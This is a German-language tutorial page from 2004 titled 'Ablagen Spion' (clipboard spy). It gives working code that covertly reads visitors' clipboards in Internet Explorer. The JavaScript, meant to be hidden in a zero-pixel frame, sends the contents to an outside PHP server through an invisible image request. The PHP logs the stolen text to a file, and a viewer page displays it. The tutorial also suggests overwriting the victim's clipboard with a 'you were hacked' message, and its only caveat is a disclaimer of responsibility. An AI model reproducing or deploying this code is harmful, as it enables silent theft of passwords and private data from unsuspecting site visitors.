Tutorials Infos - Anleitungen - Hilfe - Dreamcodes
 

Ablagen Spion

Achtung, hierfür gilt das dieses Tutorial bloß ein Beispiel darstellt. Wenn Unfug damit betrieben wird, ist der User der es nutzte für Schäden etc. selbst verantwortlich.

Der Internet Explorer bietet die Möglichkeit, per Javascript sowohl lesend als auch schreibend auf die Zwischenablage zuzugreifen. Schreiben macht man mit

window.clipboardData.setData('Text','SPAM');

lesen mit

window.clipboardData.getData('Text');

Nun ist es ein leichtes, das Clipboard auszulesen und abzuspeichern. Das Script funktioniert extern, d.h. nur das Script selber muss auf einem PHP-fähigen Server wie zb. tripod.de liegen. Der folgende Part kommt in den Quelltext der Auszuspionierenden Seite:

<script language="JavaScript">
a = window.clipboardData.getData('Text');
document.writeln("<img src=\"http://dieAdressezurphpdatei/clip.php?clip="+a+"\" width=0 height=0>");
</script>

Möchte man den Besucher ärgern, kann man den Befehl

window.clipboardData.setData('Text','Sie wurden gehackt');

oder ähnliches hinter den document.writeln Befehl einfügen.

Code möglichst versteckt (am besten in einem 0 Pixel großen Frame) unterbringen, da Sonderzeichen (z.B. wenn einer Quellcode im Clipboard hat) Fehler verursachen.

Die Auslese-Datei heißt hier clip.php und hat folgenden Inhalt:

<?php
$file = "clip.dat";

if($clip != "" && $clip != "null"){
$tmp = fopen($file, "a");
fputs($tmp,"$clip<hr>\n");
fclose($tmp);
}
?>

Weiterhin muss die bei $file angegebene Datei existieren (in diesem Fall clip.dat). In sie werden die Clipboard-Daten geschrieben. Die folgende Datei ist für die Anzeige zuständig und heißt z.B. auswertung.php:

<html>
<head>
<title>Clipboard-Spy</title>
</head>
<body bgcolor="#B6D7DE">
<p>
<?PHP
include 'clip.dat';
?>
</p>
</body>
</html>

Ruft man sie im Browser auf, kann man die erschnüffelten Clipboards sehen.

ACHTUNG : Nutzung auf eigene Verantwortung

 
ID: 417
eingestellt am: 12.05.2004
Autor: Unbekannt
Status zum lesen: Gast
gelesen: 6667
Webseite: www.dreamcodes.com
[Drucken]